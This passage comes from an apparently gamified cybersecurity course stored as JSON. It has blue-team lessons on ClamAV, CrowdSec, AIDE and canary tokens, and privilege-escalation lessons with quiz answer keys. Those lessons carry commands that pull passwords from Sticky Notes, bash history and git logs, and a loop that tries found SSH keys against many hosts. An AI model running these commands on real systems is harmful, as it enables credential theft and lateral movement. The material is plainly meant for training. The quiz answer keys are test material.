# update signatures\nclamscan -r /home/\nclamscan -ri /var/www/  # infected files only"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"ClamAV is...","opts":["Commercial","Open-source antivirus for Linux","Windows only","A firewall"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"g-df-crowdsec","cat":"Defense & Blue Team","title":"CrowdSec Collaborative IPS","diff":2,"xp":150,"intro":"Community-driven intrusion prevention.","sections":[{"type":"text","content":"Community-driven intrusion prevention."},{"type":"code","lang":"bash","content":"cscli decisions list\ncscli alerts list\n# CrowdSec shares threat intel across all users\n# Blocks known attackers from community intelligence"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"CrowdSec's advantage...","opts":["Being free","Community-shared threat intelligence across all users","Being faster","Using less resources"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"g-df-aide","cat":"Defense & Blue Team","title":"AIDE File Integrity Monitor","diff":2,"xp":150,"intro":"Detect unauthorized file modifications.","sections":[{"type":"text","content":"Detect unauthorized file modifications."},{"type":"code","lang":"bash","content":"aide --init  # create baseline\naide --check  # compare against baseline\n# Monitors: /etc/, /bin/, /usr/bin/ for changes"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"AIDE detects...","opts":["Network attacks","Unauthorized file modifications by comparing against a baseline","SQL injection","XSS"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"g-df-canary","cat":"Defense & Blue Team","title":"Canary Token Deployment","diff":2,"xp":150,"intro":"Set up tripwires that alert on attacker activity.","sections":[{"type":"text","content":"Set up tripwires that alert on attacker activity."},{"type":"code","lang":"bash","content":"# canarytokens.org - free canary tokens:\n# - Word document (alerts when opened)\n# - DNS token (alerts when resolved)\n# - AWS key (alerts when used)\n# - URL (alerts when visited)\n# Deploy in: file shares, code repos, credential stores"},{"type":"text","content":"You must be right every time; attackers only once. Good defense isn't blocking everything. It's detecting quickly and responding effectively. Reduce dwell time, limit blast radius."},{"type":"tip","content":"Focus detection on real attacker techniques. Map against MITRE ATT&CK, find gaps, build rules for common techniques first. Quality over quantity."},{"type":"task","content":"Set up ELK or Wazuh. Forward logs from two sources. Write rules for brute force, new user creation, suspicious PowerShell. Test by simulating each attack."},{"type":"quiz","q":"Any canary token interaction means...","opts":["Normal activity","An attacker is present (zero false positive by design)","A misconfiguration","A test"],"ans":1},{"type":"quiz","q":"IDS vs IPS: IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"A SIEM correlates...","opts":["User accounts","Logs from multiple sources","Network cables","Encryption keys"],"ans":1},{"type":"quiz","q":"What is a honeypot?","opts":["A real production server","A decoy system designed to detect attackers","A type of firewall","An encryption method"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploit code","Hardening guidelines for specific platforms","Password lists","Network maps"],"ans":1},{"type":"quiz","q":"Patch management is important because...","opts":["It makes systems faster","Unpatched vulnerabilities are the top attack vector","It saves disk space","It improves UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall Application","Monitored Filter Agent"],"ans":1},{"type":"quiz","q":"Network segmentation limits...","opts":["Internet speed","Lateral movement after a breach","User productivity","DNS resolution"],"ans":1},{"type":"quiz","q":"Principle of least privilege means...","opts":["No access for anyone","Minimum access needed for the job","Maximum access","Root for everyone"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Data Recovery","Endpoint Detection and Response","Encrypted Disk Reader","Event Driven Router"],"ans":1},{"type":"quiz","q":"A security baseline is...","opts":["A starting point for attacks","A minimum security configuration standard","A type of firewall","An encryption algorithm"],"ans":1},{"type":"quiz","q":"Blue team's primary goal is...","opts":["Attack systems","Defend and detect threats","Write exploits","Crack passwords"],"ans":1},{"type":"quiz","q":"Log retention is important because...","opts":["Logs take up space","You need them for incident investigation","They slow systems","They contain passwords"],"ans":1},{"type":"quiz","q":"What is threat modeling?","opts":["Building malware","Identifying potential threats during design","Network scanning","Penetration testing"],"ans":1},{"type":"quiz","q":"Security awareness training reduces...","opts":["Network speed","Human error leading to breaches","Server load","Encryption strength"],"ans":1},{"type":"quiz","q":"IPS can...","opts":["Only detect","Detect AND block","Only log","Only alert"],"ans":1},{"type":"quiz","q":"SIEM correlates...","opts":["Users","Logs from multiple sources","Cables","Keys"],"ans":1},{"type":"quiz","q":"Honeypot is...","opts":["Production server","Decoy to detect attackers","Firewall","Encryption"],"ans":1},{"type":"quiz","q":"CIS Benchmarks provide...","opts":["Exploits","Hardening guidelines","Passwords","Network maps"],"ans":1},{"type":"quiz","q":"Patch management matters because...","opts":["Speed","Unpatched is #1 attack vector","Disk space","UI"],"ans":1},{"type":"quiz","q":"MFA stands for...","opts":["Multiple File Access","Multi-Factor Authentication","Managed Firewall","Monitored Filter"],"ans":1},{"type":"quiz","q":"Segmentation limits...","opts":["Internet speed","Lateral movement","Productivity","DNS"],"ans":1},{"type":"quiz","q":"Least privilege means...","opts":["No access","Minimum needed for job","Maximum","Root for all"],"ans":1},{"type":"quiz","q":"EDR stands for...","opts":["External Recovery","Endpoint Detection and Response","Encrypted Disk","Event Router"],"ans":1},{"type":"quiz","q":"Blue team's goal is...","opts":["Attack","Defend and detect threats","Write exploits","Crack passwords"],"ans":1}]},{"id":"pe-sticky-notes","cat":"Privilege Escalation","title":"Windows Sticky Notes Credentials","diff":1,"xp":50,"intro":"Sticky Notes stores text in a SQLite database \u2014 sometimes with passwords.","sections":[{"type":"text","content":"Users write passwords in Sticky Notes. The data is stored in plum.sqlite, readable by any local user."},{"type":"code","lang":"bash","content":"type C:Users*AppDataLocalPackagesMicrosoft.MicrosoftStickyNotes*LocalStateplum.sqlite"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Sticky Notes data is stored in...","opts":["Encrypted vault","SQLite database (plum.sqlite)","Registry","Cloud only"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1},{"type":"quiz","q":"SeImpersonate allows...","opts":["File deletion","Token impersonation (Potato)","Registry editing","Scanning"],"ans":1},{"type":"quiz","q":"Unquoted path exploits...","opts":["Short paths","Spaces without quotes","Disabled services","Encrypted binaries"],"ans":1},{"type":"quiz","q":"PATH hijacking exploits...","opts":["Absolute paths","Relative command names","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SAM stores...","opts":["Network config","Local Windows password hashes","Registry","Event logs"],"ans":1},{"type":"quiz","q":"What checks Windows privesc?","opts":["nmap","WinPEAS/PowerUp","Wireshark","Burp"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anon access","Remote root = server root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"pspy monitors...","opts":["Network","Processes without root","Files","Registry"],"ans":1},{"type":"quiz","q":"chmod +s sets...","opts":["Secret flag","SUID/SGID bit","Share flag","Sticky bit"],"ans":1},{"type":"quiz","q":"Windows SAM is protected by...","opts":["Encryption only","A lock by the running OS","Permissions","Password"],"ans":1},{"type":"quiz","q":"id command shows...","opts":["IP address","UID, GID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"What UID is root?","opts":["1","1000","65534","0"],"ans":3},{"type":"quiz","q":"env command shows...","opts":["Network config","Environment variables","File list","Process list"],"ans":1},{"type":"quiz","q":"Backup files are dangerous because...","opts":["Encrypted","Contain same sensitive data as original","Always empty","Read-only"],"ans":1},{"type":"quiz","q":"systemd service files control...","opts":["Network","Service startup and behavior","DNS","Firewall"],"ans":1}]},{"id":"pe-bash-history","cat":"Privilege Escalation","title":"Bash History Credential Mining","diff":1,"xp":50,"intro":"Commands typed in the terminal are saved \u2014 including passwords.","sections":[{"type":"text","content":"Users type passwords in commands: mysql -p'password', sshpass, curl with API keys. Check .bash_history."},{"type":"code","lang":"bash","content":"cat ~/.bash_history | grep -iE 'pass|secret|key|token|mysql|ssh'\ncat /home/*/.bash_history 2>/dev/null | grep -i password"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Bash history is dangerous because users...","opts":["Never use terminals","Sometimes type passwords directly in commands","Encrypt history","Delete it daily"],"ans":1},{"type":"quiz","q":"Writable root scripts give...","opts":["Read access","Code execution as root","Log viewing","Network access"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1},{"type":"quiz","q":"SeImpersonate allows...","opts":["File deletion","Token impersonation (Potato)","Registry editing","Scanning"],"ans":1},{"type":"quiz","q":"Unquoted path exploits...","opts":["Short paths","Spaces without quotes","Disabled services","Encrypted binaries"],"ans":1},{"type":"quiz","q":"PATH hijacking exploits...","opts":["Absolute paths","Relative command names","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SAM stores...","opts":["Network config","Local Windows password hashes","Registry","Event logs"],"ans":1},{"type":"quiz","q":"What checks Windows privesc?","opts":["nmap","WinPEAS/PowerUp","Wireshark","Burp"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anon access","Remote root = server root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"pspy monitors...","opts":["Network","Processes without root","Files","Registry"],"ans":1},{"type":"quiz","q":"chmod +s sets...","opts":["Secret flag","SUID/SGID bit","Share flag","Sticky bit"],"ans":1},{"type":"quiz","q":"Windows SAM is protected by...","opts":["Encryption only","A lock by the running OS","Permissions","Password"],"ans":1},{"type":"quiz","q":"id command shows...","opts":["IP address","UID, GID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"What UID is root?","opts":["1","1000","65534","0"],"ans":3},{"type":"quiz","q":"env command shows...","opts":["Network config","Environment variables","File list","Process list"],"ans":1},{"type":"quiz","q":"Backup files are dangerous because...","opts":["Encrypted","Contain same sensitive data as original","Always empty","Read-only"],"ans":1}]},{"id":"pe-ssh-key-reuse","cat":"Privilege Escalation","title":"SSH Key Reuse for Lateral Movement","diff":2,"xp":150,"intro":"Private keys found on one machine may work on others.","sections":[{"type":"text","content":"If you find a private key, try it against every other host. Users often reuse keys across machines."},{"type":"code","lang":"bash","content":"find / -name 'id_rsa' -o -name 'id_ed25519' 2>/dev/null\nfor host in $(cat hosts.txt); do ssh -i found_key user@$host 'hostname' 2>/dev/null && echo \"KEY WORKS: $host\"; done"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Found SSH keys should be tested against...","opts":["Only the local machine","Every reachable host (users reuse keys)","Only web servers","Only databases"],"ans":1},{"type":"quiz","q":"systemd service files control...","opts":["Network","Service startup and behavior","DNS","Firewall"],"ans":1},{"type":"quiz","q":"Writable root scripts give...","opts":["Read access","Code execution as root","Log viewing","Network access"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1},{"type":"quiz","q":"SeImpersonate allows...","opts":["File deletion","Token impersonation (Potato)","Registry editing","Scanning"],"ans":1},{"type":"quiz","q":"Unquoted path exploits...","opts":["Short paths","Spaces without quotes","Disabled services","Encrypted binaries"],"ans":1},{"type":"quiz","q":"PATH hijacking exploits...","opts":["Absolute paths","Relative command names","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SAM stores...","opts":["Network config","Local Windows password hashes","Registry","Event logs"],"ans":1},{"type":"quiz","q":"What checks Windows privesc?","opts":["nmap","WinPEAS/PowerUp","Wireshark","Burp"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anon access","Remote root = server root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"pspy monitors...","opts":["Network","Processes without root","Files","Registry"],"ans":1},{"type":"quiz","q":"chmod +s sets...","opts":["Secret flag","SUID/SGID bit","Share flag","Sticky bit"],"ans":1},{"type":"quiz","q":"Windows SAM is protected by...","opts":["Encryption only","A lock by the running OS","Permissions","Password"],"ans":1},{"type":"quiz","q":"id command shows...","opts":["IP address","UID, GID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"What UID is root?","opts":["1","1000","65534","0"],"ans":3},{"type":"quiz","q":"env command shows...","opts":["Network config","Environment variables","File list","Process list"],"ans":1}]},{"id":"pe-git-secrets","cat":"Privilege Escalation","title":"Credentials in Git Repositories","diff":2,"xp":150,"intro":"Local git repos contain commit history with accidentally committed secrets.","sections":[{"type":"text","content":"Check .git directories for credentials committed and later removed \u2014 they're still in git history."},{"type":"code","lang":"bash","content":"find / -name '.git' -type d 2>/dev/null\ncd /opt/app && git log --all --full-history -p | grep -iE 'password|secret|key|token' | head -20"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Git history contains removed secrets because...","opts":["Git encrypts them","Commits are permanent even after files are deleted","Git uses compression","Secrets are hashed"],"ans":1},{"type":"quiz","q":"Backup files are dangerous because...","opts":["Encrypted","Contain same sensitive data as original","Always empty","Read-only"],"ans":1},{"type":"quiz","q":"systemd service files control...","opts":["Network","Service startup and behavior","DNS","Firewall"],"ans":1},{"type":"quiz","q":"Writable root scripts give...","opts":["Read access","Code execution as root","Log viewing","Network access"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1},{"type":"quiz","q":"SeImpersonate allows...","opts":["File deletion","Token impersonation (Potato)","Registry editing","Scanning"],"ans":1},{"type":"quiz","q":"Unquoted path exploits...","opts":["Short paths","Spaces without quotes","Disabled services","Encrypted binaries"],"ans":1},{"type":"quiz","q":"PATH hijacking exploits...","opts":["Absolute paths","Relative command names","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SAM stores...","opts":["Network config","Local Windows password hashes","Registry","Event logs"],"ans":1},{"type":"quiz","q":"What checks Windows privesc?","opts":["nmap","WinPEAS/PowerUp","Wireshark","Burp"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anon access","Remote root = server root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"pspy monitors...","opts":["Network","Processes without root","Files","Registry"],"ans":1},{"type":"quiz","q":"chmod +s sets...","opts":["Secret flag","SUID/SGID bit","Share flag","Sticky bit"],"ans":1},{"type":"quiz","q":"Windows SAM is protected by...","opts":["Encryption only","A lock by the running OS","Permissions","Password"],"ans":1},{"type":"quiz","q":"id command shows...","opts":["IP address","UID, GID, and groups","System info","Network interfaces"],"ans":1},{"type":"quiz","q":"What UID is root?","opts":["1","1000","65534","0"],"ans":3}]},{"id":"pe-capabilities-deep","cat":"Privilege Escalation","title":"Linux Capabilities Deep Dive","diff":4,"xp":250,"intro":"Beyond 